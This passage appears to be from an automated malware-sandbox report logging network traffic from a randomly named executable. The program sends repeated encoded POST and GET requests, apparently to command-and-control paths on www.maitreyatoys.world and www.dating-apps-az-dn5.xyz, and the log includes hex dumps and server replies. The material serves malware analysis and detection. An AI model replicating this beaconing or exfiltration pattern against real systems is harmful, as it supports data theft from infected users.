                                                                      Data Ascii: xP7x=lHgkb+a8mCncCJcgvYLgSn53edCq6dcFZ0aWz2zsqFB+gEKCpovn31MZiy4toUsXPkbT+L5WYhg5EnTZD42ZIW6y9rgnFbShmRe/Yn+aRfNDRFsZwF0hdVHRa3Kqhl1itOJvdhqVXmWt9VL3+iUN12B+EpmWJMO3xxsK/ZqKKOdmour+6J5+doOng4B+dcvVbw==
                                                                      Jan 8, 2025 16:15:10.616898060 CET322INHTTP/1.1 403 Forbidden
                                                                      Server: nginx
                                                                      Date: Wed, 08 Jan 2025 15:15:10 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      38192.168.2.450040194.245.148.189803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:15:12.533767939 CET793OUTPOST /dvmh/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.maitreyatoys.world
                                                                      Origin: http://www.maitreyatoys.world
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 221
                                                                      Connection: close
                                                                      Referer: http://www.maitreyatoys.world/dvmh/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 6c 48 67 6b 62 2b 61 38 6d 43 6e 63 44 6f 73 67 70 2f 66 67 46 58 35 6f 62 64 43 71 31 39 63 42 5a 30 6d 57 7a 33 33 38 71 77 78 2b 68 6c 36 43 6d 4a 76 6e 30 31 4d 5a 70 53 34 30 31 45 74 36 50 6b 6d 67 2b 4f 35 57 59 68 30 35 45 6d 6a 5a 44 76 69 61 4a 47 36 30 32 4c 67 66 4c 37 53 68 6d 52 65 2f 59 6b 43 38 52 66 31 44 51 32 6b 5a 77 6e 4d 67 58 31 48 65 4d 6e 4b 71 79 31 31 6d 74 4f 49 36 64 67 47 2f 58 6b 75 74 39 56 62 33 2b 77 73 53 6d 57 42 38 41 70 6e 76 4b 65 75 6e 30 45 45 46 33 34 75 65 4e 73 49 4c 67 49 6d 6b 72 34 59 70 50 6f 71 55 39 2f 49 4b 51 66 53 63 41 30 77 2b 6a 6a 5a 6c 63 36 72 63 5a 5a 38 6b 52 51 57 69 47 44 49 3d
                                                                      Data Ascii: xP7x=lHgkb+a8mCncDosgp/fgFX5obdCq19cBZ0mWz338qwx+hl6CmJvn01MZpS401Et6Pkmg+O5WYh05EmjZDviaJG602LgfL7ShmRe/YkC8Rf1DQ2kZwnMgX1HeMnKqy11mtOI6dgG/Xkut9Vb3+wsSmWB8ApnvKeun0EEF34ueNsILgImkr4YpPoqU9/IKQfScA0w+jjZlc6rcZZ8kRQWiGDI=
                                                                      Jan 8, 2025 16:15:13.142661095 CET322INHTTP/1.1 403 Forbidden
                                                                      Server: nginx
                                                                      Date: Wed, 08 Jan 2025 15:15:13 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      39192.168.2.450041194.245.148.189803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:15:15.084863901 CET10875OUTPOST /dvmh/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.maitreyatoys.world
                                                                      Origin: http://www.maitreyatoys.world
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10301
                                                                      Connection: close
                                                                      Referer: http://www.maitreyatoys.world/dvmh/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 6c 48 67 6b 62 2b 61 38 6d 43 6e 63 44 6f 73 67 70 2f 66 67 46 58 35 6f 62 64 43 71 31 39 63 42 5a 30 6d 57 7a 33 33 38 71 77 35 2b 67 54 6d 43 6e 71 48 6e 31 31 4d 5a 79 79 34 70 31 45 74 43 50 6b 2b 73 2b 4f 39 47 59 6a 4d 35 45 45 72 5a 55 4f 69 61 51 32 36 30 35 72 67 6b 46 62 53 30 6d 51 75 7a 59 6b 53 38 52 66 31 44 51 32 49 5a 32 31 30 67 52 31 48 52 61 33 4b 75 68 6c 31 4f 74 4e 34 71 64 67 7a 49 58 58 6d 74 39 30 72 33 79 6a 55 53 38 57 42 79 48 70 6e 65 4b 65 6a 67 30 41 64 30 33 34 61 30 4e 75 55 4c 6a 63 6a 61 76 62 6f 6a 64 34 75 36 2b 59 67 51 52 59 71 68 4c 6b 30 72 73 69 5a 64 45 4c 37 79 66 2b 49 76 4d 56 47 6c 62 31 35 57 33 69 62 4a 67 57 71 71 79 31 5a 42 79 45 37 4b 49 4e 48 54 6a 68 6a 64 54 33 31 33 31 41 4e 6b 49 2b 69 7a 61 31 51 77 39 7a 6c 2b 6c 73 52 53 61 6b 55 4d 75 37 7a 58 67 62 6f 6a 36 33 6c 51 57 36 2b 44 53 75 6f 74 74 37 66 56 6f 6d 6f 38 4f 52 50 56 57 7a 44 2b 49 33 74 43 56 50 59 4a 49 54 65 47 68 6d 30 4d 51 50 47 58 6e 50 72 53 7a 48 68 2f 4a [TRUNCATED]
                                                                      Data Ascii: xP7x=lHgkb+a8mCncDosgp/fgFX5obdCq19cBZ0mWz338qw5+gTmCnqHn11MZyy4p1EtCPk+s+O9GYjM5EErZUOiaQ2605rgkFbS0mQuzYkS8Rf1DQ2IZ210gR1HRa3Kuhl1OtN4qdgzIXXmt90r3yjUS8WByHpneKejg0Ad034a0NuULjcjavbojd4u6+YgQRYqhLk0rsiZdEL7yf+IvMVGlb15W3ibJgWqqy1ZByE7KINHTjhjdT3131ANkI+iza1Qw9zl+lsRSakUMu7zXgboj63lQW6+DSuott7fVomo8ORPVWzD+I3tCVPYJITeGhm0MQPGXnPrSzHh/JJ0IHl7YPyBJaFPUuSDWL8JG9jbogsp4BKOs6YKtivz8JTWZP8sZBEhh2ypiIHppwlq4YIEdGPKKClO/lxRGOX44c7hQRwFMIXw7+gokKuuzdsSJ3c4au9OgNoT+mQzd8635KR23tO1uL16+3238l6R5UDR4UIJRaOfKUBj6gsFuQ4XUPcdIKQBJalykaO/GF61wMLuA15tbJ7fJwsg2WgQY5PNb5uhxy+4QT4E+zV5tf20ELti6E400Y8HM8bCDxIEYYsWTBsg7Vzv3PFSrDyoAeqg+8yfZHuVpbXmQ+oGrQwIjI9Y4kQQF9TZsKVQK+PmcO2Qd3v0WLcE3xpNVmImYt79XezmhDzstG+idWsU4RyKinfyFLiQFgfYGzso7f6VmwvQsnwdvZ0wOF2w1qS4mF9UL+lQ//+Jl8n8q1amYyTOMn9uOr1kR4A6boA6Rg1V+ihe6nJF4BLXevhmGHc5n/nYrOLOvQN/2B6tadysOLUYDKtwqpzNlWd3OjM7zzY0mqgMmuyJLVjV+Mim3UCVlk9SCbq8IO6bn5fPrGGygqB5IiQGLe2mHonnh0+S4vXTQXQt0WoJnftTX0vhjpZkCg6zDsetMFMoavQwnRVha52+OvtdA9SxmRgAw3coriZajpFLYo0o9jyySweKUXDHCTbB5kDm4Lz9 [TRUNCATED]
                                                                      Jan 8, 2025 16:15:15.774914026 CET322INHTTP/1.1 403 Forbidden
                                                                      Server: nginx
                                                                      Date: Wed, 08 Jan 2025 15:15:15 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      40192.168.2.450042194.245.148.189803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:15:17.622776985 CET494OUTGET /dvmh/?F4=Q0yHy&xP7x=oFIEYIO2gjvnF7MstK6lKHEue9aF/tlAMWbI9WLDgwNy2jujsZOasn0dsRYzh1BdbVLS+4ZlfSYhPFaSDYrrMgKpzoJ2CbempAqVOW6SbKF8YFlZ5FonZlU= HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.maitreyatoys.world
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Jan 8, 2025 16:15:18.236078024 CET242INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Wed, 08 Jan 2025 15:15:18 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 1840
                                                                      Last-Modified: Tue, 04 Apr 2017 13:56:46 GMT
                                                                      Connection: close
                                                                      ETag: "58e3a61e-730"
                                                                      Accept-Ranges: bytes
                                                                      Jan 8, 2025 16:15:18.236100912 CET1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> ... The above 3 meta
                                                                      Jan 8, 2025 16:15:18.236113071 CET604INData Raw: 7a 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 70 3e 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6c 67 20 62 74 6e 2d 73 75 63 63 65 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 6f 6b 65 72 2e 63 6f 6d 2f 3f
                                                                      Data Ascii: zation.</p> <p><a class="btn btn-lg btn-success" href="https://joker.com/?pk_campaign=Parking&pk_kwd=text" role="button">JOKER.COM</a></p> </div> <footer class="footer"> <p>&copy; 2017 CSL GmbH / JOKER.COM</p>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      41192.168.2.450043199.59.243.228803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:15:23.403045893 CET785OUTPOST /pn0u/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dating-apps-az-dn5.xyz
                                                                      Origin: http://www.dating-apps-az-dn5.xyz
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 201
                                                                      Connection: close
                                                                      Referer: http://www.dating-apps-az-dn5.xyz/pn0u/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 75 45 47 55 70 6a 72 30 6f 4d 64 69 4b 76 69 45 4d 71 53 33 67 78 34 55 2b 33 54 45 50 2b 32 32 6c 46 4b 74 7a 6a 47 62 49 6d 72 54 50 44 53 56 6c 4c 48 66 44 70 57 2f 68 48 72 79 78 39 2f 30 75 54 6f 72 32 4a 6b 78 56 5a 53 78 56 4e 74 58 30 42 52 4b 71 6d 4f 70 4c 71 4d 63 56 5a 6a 42 6a 54 66 58 6c 49 6e 78 53 63 4d 48 51 7a 6c 71 53 4b 5a 6e 48 78 53 39 73 70 36 35 38 4c 44 77 61 68 7a 75 2f 6d 6d 4a 78 53 55 33 6a 33 32 37 4f 53 74 5a 63 4c 32 49 77 4f 67 77 4b 53 71 64 6f 56 6a 33 48 4f 48 79 59 39 74 4b 62 54 6f 48 4f 33 71 38 71 70 61 41 49 6e 6d 6c 4e 78 33 48 56 67 3d 3d
                                                                      Data Ascii: xP7x=uEGUpjr0oMdiKviEMqS3gx4U+3TEP+22lFKtzjGbImrTPDSVlLHfDpW/hHryx9/0uTor2JkxVZSxVNtX0BRKqmOpLqMcVZjBjTfXlInxScMHQzlqSKZnHxS9sp658LDwahzu/mmJxSU3j327OStZcL2IwOgwKSqdoVj3HOHyY9tKbToHO3q8qpaAInmlNx3HVg==
                                                                      Jan 8, 2025 16:15:23.844939947 CET1236INHTTP/1.1 200 OK
                                                                      date: Wed, 08 Jan 2025 15:15:23 GMT
                                                                      content-type: text/html; charset=utf-8
                                                                      content-length: 1154
                                                                      x-request-id: c18d9566-2d10-4d5f-aa0f-1b7b59b3985c
                                                                      cache-control: no-store, max-age=0
                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bWcZewp8eISZBr0lUYb166dr3nPAuKFm8lkyMSyz0VztdD3st25mfrrotBOQpEyYQuOCOGrRVeBKclo1TlhzHg==
                                                                      set-cookie: parking_session=c18d9566-2d10-4d5f-aa0f-1b7b59b3985c; expires=Wed, 08 Jan 2025 15:30:23 GMT; path=/
                                                                      connection: close
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 57 63 5a 65 77 70 38 65 49 53 5a 42 72 30 6c 55 59 62 31 36 36 64 72 33 6e 50 41 75 4b 46 6d 38 6c 6b 79 4d 53 79 7a 30 56 7a 74 64 44 33 73 74 32 35 6d 66 72 72 6f 74 42 4f 51 70 45 79 59 51 75 4f 43 4f 47 72 52 56 65 42 4b 63 6c 6f 31 54 6c 68 7a 48 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bWcZewp8eISZBr0lUYb166dr3nPAuKFm8lkyMSyz0VztdD3st25mfrrotBOQpEyYQuOCOGrRVeBKclo1TlhzHg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Jan 8, 2025 16:15:23.844957113 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzE4ZDk1NjYtMmQxMC00ZDVmLWFhMGYtMWI3YjU5YjM5ODVjIiwicGFnZV90aW1lIjoxNzM2MzQ5Mz


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      42192.168.2.450044199.59.243.228803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:15:25.962300062 CET805OUTPOST /pn0u/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dating-apps-az-dn5.xyz
                                                                      Origin: http://www.dating-apps-az-dn5.xyz
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 221
                                                                      Connection: close
                                                                      Referer: http://www.dating-apps-az-dn5.xyz/pn0u/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 75 45 47 55 70 6a 72 30 6f 4d 64 69 59 2b 53 45 4b 4e 2b 33 31 42 34 58 37 33 54 45 64 2b 32 79 6c 46 47 74 7a 6e 57 4c 4c 56 66 54 50 68 36 56 6b 4b 48 66 43 70 57 2f 76 6e 72 37 2f 64 2f 7a 75 54 30 4e 32 4d 6b 78 56 5a 32 78 56 4a 39 58 6f 69 35 4a 73 6d 4f 38 48 4b 4d 53 59 35 6a 42 6a 54 66 58 6c 49 6a 49 53 63 55 48 51 6a 56 71 55 66 6c 6f 45 78 53 38 6c 4a 36 35 75 37 44 4b 61 68 7a 32 2f 6a 50 73 78 51 63 33 6a 79 61 37 50 44 74 47 53 4c 33 44 76 65 68 51 50 7a 43 59 6c 32 47 76 48 59 48 51 57 4a 64 34 58 31 6c 64 66 47 4c 72 34 70 2b 7a 56 67 76 52 41 79 4b 4f 4f 69 35 69 62 64 71 37 34 55 5a 51 64 41 51 2b 48 36 52 50 32 70 59 3d
                                                                      Data Ascii: xP7x=uEGUpjr0oMdiY+SEKN+31B4X73TEd+2ylFGtznWLLVfTPh6VkKHfCpW/vnr7/d/zuT0N2MkxVZ2xVJ9Xoi5JsmO8HKMSY5jBjTfXlIjIScUHQjVqUfloExS8lJ65u7DKahz2/jPsxQc3jya7PDtGSL3DvehQPzCYl2GvHYHQWJd4X1ldfGLr4p+zVgvRAyKOOi5ibdq74UZQdAQ+H6RP2pY=
                                                                      Jan 8, 2025 16:15:26.403902054 CET1236INHTTP/1.1 200 OK
                                                                      date: Wed, 08 Jan 2025 15:15:25 GMT
                                                                      content-type: text/html; charset=utf-8
                                                                      content-length: 1154
                                                                      x-request-id: 6bcd2892-5a32-4cc0-902e-f373049b7752
                                                                      cache-control: no-store, max-age=0
                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bWcZewp8eISZBr0lUYb166dr3nPAuKFm8lkyMSyz0VztdD3st25mfrrotBOQpEyYQuOCOGrRVeBKclo1TlhzHg==
                                                                      set-cookie: parking_session=6bcd2892-5a32-4cc0-902e-f373049b7752; expires=Wed, 08 Jan 2025 15:30:26 GMT; path=/
                                                                      connection: close
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 57 63 5a 65 77 70 38 65 49 53 5a 42 72 30 6c 55 59 62 31 36 36 64 72 33 6e 50 41 75 4b 46 6d 38 6c 6b 79 4d 53 79 7a 30 56 7a 74 64 44 33 73 74 32 35 6d 66 72 72 6f 74 42 4f 51 70 45 79 59 51 75 4f 43 4f 47 72 52 56 65 42 4b 63 6c 6f 31 54 6c 68 7a 48 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bWcZewp8eISZBr0lUYb166dr3nPAuKFm8lkyMSyz0VztdD3st25mfrrotBOQpEyYQuOCOGrRVeBKclo1TlhzHg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Jan 8, 2025 16:15:26.403923035 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmJjZDI4OTItNWEzMi00Y2MwLTkwMmUtZjM3MzA0OWI3NzUyIiwicGFnZV90aW1lIjoxNzM2MzQ5Mz


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      43192.168.2.450045199.59.243.228803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:15:28.502588987 CET10887OUTPOST /pn0u/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dating-apps-az-dn5.xyz
                                                                      Origin: http://www.dating-apps-az-dn5.xyz
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10301
                                                                      Connection: close
                                                                      Referer: http://www.dating-apps-az-dn5.xyz/pn0u/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
